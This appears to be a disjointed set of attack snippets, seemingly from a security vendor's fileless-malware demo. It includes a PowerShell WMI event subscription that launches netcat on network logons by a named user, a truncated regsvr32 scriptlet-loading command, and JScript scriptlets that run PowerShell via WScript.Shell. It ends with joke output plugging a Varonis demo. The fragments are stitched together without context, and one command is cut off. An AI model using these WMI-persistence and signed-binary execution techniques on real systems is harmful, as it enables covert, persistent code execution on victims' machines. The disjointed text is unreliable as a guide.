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agreenjay agreenjay

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powershell -noexit -noprofile -C {Register-WMIEvent -Query "Select TargetInstance From __InstanceCreationEvent WITHIN 10 WHERE TargetInstance ISA 'win32_LogOnSession' AND TargetInstance.LogonType=3" -Action {$names=gwmi Win32_Process;$users=@(); foreach ($n in $names){ $users += $n.GetOwner().User};foreach ($user in $users){if ($user -eq 'cruella') { C:\Users\lex\Documents\nc.exe 10000 }}}}
Register-WMIEvent -Query "Select TargetInstance From __InstanceCreationEvent WITHIN 10 WHERE TargetInstance ISA 'win32_LogOnSession' AND TargetInstance.LogonType=3" -Action {$names=gwmi Win32_Process;$users=@(); foreach ($n in $names){ $users += $n.GetOwner().User};foreach ($user in $users){if ($user -eq 'cruella') { C:\Users\lex\Documents\nc.exe 10000 }}}
Register-WMIEvent -Query "Select TargetInstance From __InstanceCreationEvent WITHIN 10 WHERE TargetInstance ISA 'win32_LogOnSession' AND TargetInstance.LogonType=3" -Action {$names=gwmi Win32_Process;$users=@(); foreach ($n in $names){ $users += $n.GetOwner().User};foreach ($user in $users){if ($user -eq 'cruella') { C:\Users\lex\Documents\nc.exe 10000 }}}
regsvr32 /s /n /u /i:
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<script language="JScript">
var r = new ActiveXObject("WScript.Shell").Run("powershell -noe write-host Booo!");
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var r = new ActiveXObject("WScript.Shell").Run("powershell -noe -nop write-host");
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<script language="JScript">
var foo = new ActiveXObject("WScript.Shell").Run("echo If you see this message, you need to review your security. See for answers");
write-host "If you see this message, you have lots of security mitigation work ahead of you!"
write-host "Watching GIF animations showing JavaScript malware launched from an ADS"
start-sleep -seconds 4
write-host "can be strangely compelling."
start-sleep -seconds 4
write-host "You'll want to watch this video over and over "
start-sleep -seconds 5
write-host "and over. And now you have an uncontrollabe urge to click the CTA."
start-sleep -seconds 3
write-host "The one that says Free Varonis Demo!"